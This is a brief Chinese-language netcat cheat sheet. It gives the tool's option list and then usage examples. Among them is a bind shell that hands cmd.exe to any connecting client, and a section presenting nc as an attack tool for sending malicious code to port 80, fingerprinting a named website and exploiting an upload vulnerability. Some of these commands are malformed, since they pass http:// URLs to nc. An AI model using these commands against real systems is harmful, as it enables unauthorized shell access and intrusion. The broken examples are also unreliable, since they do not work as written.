命令参数
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
用法
连接某台电脑的某个端口
nc -vv 192.168.83.129 3000
监听电脑的某个端口,一般用于反向连接
nc -l -p 3000
监听端口,并使用telnet连接后执行特定命令
nc -l -p 1314 -t -e cmd.exe
作为攻击工具
发送恶意代码至80端口
type c:\test.txt | nc -nvv 127.0.0.1 80
nc -L -p 80 > c:\log.txt
得到对方服务器的类别
nc -vv http://www.lzhword.cn/
提交数据(上传漏洞)
nc.exe -vv http://www.lzhword.cn 80 <(重定向) 1.txt